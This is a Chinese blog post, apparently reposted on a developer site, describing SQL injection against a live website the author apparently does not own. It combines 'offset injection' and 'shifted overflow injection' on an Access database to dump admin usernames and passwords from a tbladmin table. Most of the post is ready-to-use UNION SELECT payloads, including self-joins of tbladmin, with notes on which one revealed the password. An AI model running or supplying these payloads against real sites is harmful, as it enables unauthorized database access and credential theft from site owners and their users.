内容简介:这个灵感是我突然冒出来的,最近有一个只能出来表名的站,一直没的机会实战,正好练习一下偏移注入和移位溢注,顺便总结一下,结果偏移注入成功了,移位溢注倒是不行了,心有不甘(我人品有这么差么?),才有了下文。偏移注入,移位溢注的正常的手法,原理在这里就不写了,描述下站点大概情况,方便大家了解,懂得自然懂。
这个灵感是我突然冒出来的,最近有一个只能出来表名的站,一直没的机会实战,正好练习一下偏移注入和移位溢注,顺便总结一下,结果偏移注入成功了,移位溢注倒是不行了,心有不甘(我人品有这么差么?),才有了下文。
偏移注入,移位溢注的正常的手法,原理在这里就不写了,描述下站点大概情况,方便大家了解,懂得自然懂。
order by 12 - 正常 union select 1,2,3,4,5,6,7,8,* from tbladmin - 正常
显示位
开始移位溢注:
当我使用移位溢注时,遇到了一点小麻烦:
2.1 先测试位置显示位6(失败):
union select 1,2,3,4,5,tbladmin.*,10,11,12 from tbladmin
union select 1,2,3,4,5,tbladmin.*,10,11,12 from tbladmin where id=1 - 返回同上 union select 1,2,3,4,5,tbladmin.*,10,11,12 from tbladmin where id=2 - 发布时间处:1变成了2 ... union select 1,2,3,4,5,tbladmin.*,10,11,12 from tbladmin where id=n - 开始一直返回正常页面了
2.2 然后测试显示位2和3(失败):
union select 1,tbladmin.*,6,7,8,9,10,11,12 from tbladmin - 爆出了一个用户名
union select 1,tbladmin.*,6,7,8,9,10,11,12 from tbladmin where id=1 - 返回内容同上 union select 1,tbladmin.*,6,7,8,9,10,11,12 from tbladmin where id=2 - 如下图,一个新的用户名 ... union select 1,tbladmin.*,6,7,8,9,10,11,12 from tbladmin where id=n - 开始一直返回正常页面了
到了现在,可以发现问题出现了,移位溢注的招式已经用完了,但是显示位明显不够啊,还是爆不出来密码,这样看来,移位溢注还是不能完全和人品说拜拜
联合使用出奇效:
偏移注入的本质是:打乱显示顺序
移位溢注的本质是:占用多处显位
都是为了有一定概率让账号密码出现在显示位上,那么 联合起来 会怎么样呢?下面语句不做分析,还是懂的人自然懂
union select 1,2,3,4,a.*,b.*, * from (tbladmin as a inner join tbladmin as b on a.id=b.id)
union select 1,2,3,4,a.*, * from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 显示结果同上 union select 1,2,3,a.*,4, * from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 出现密码了
union select 1,2,a.*,3,4, * from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 发生变化
union select 1,a.*,2,3,4, * from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 继续变化
union select a.*,1,2,3,4, * from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 同时显示
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
- opencv笔记(2):图像剪切和图像移位
- 记一次Access偏移注入
- ios – reloadRowsAtIndexPaths时保持偏移量
- Kafka 消息偏移量的维护
- Spark Streaming 之 Kafka 偏移量管理
- php-rdkafka手动提交偏移量
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Head First HTML and CSS
Elisabeth Robson、Eric Freeman / O'Reilly Media / 2012-9-8 / USD 39.99
Tired of reading HTML books that only make sense after you're an expert? Then it's about time you picked up Head First HTML and really learned HTML. You want to learn HTML so you can finally create th......一起来看看 《Head First HTML and CSS》 这本书的介绍吧!
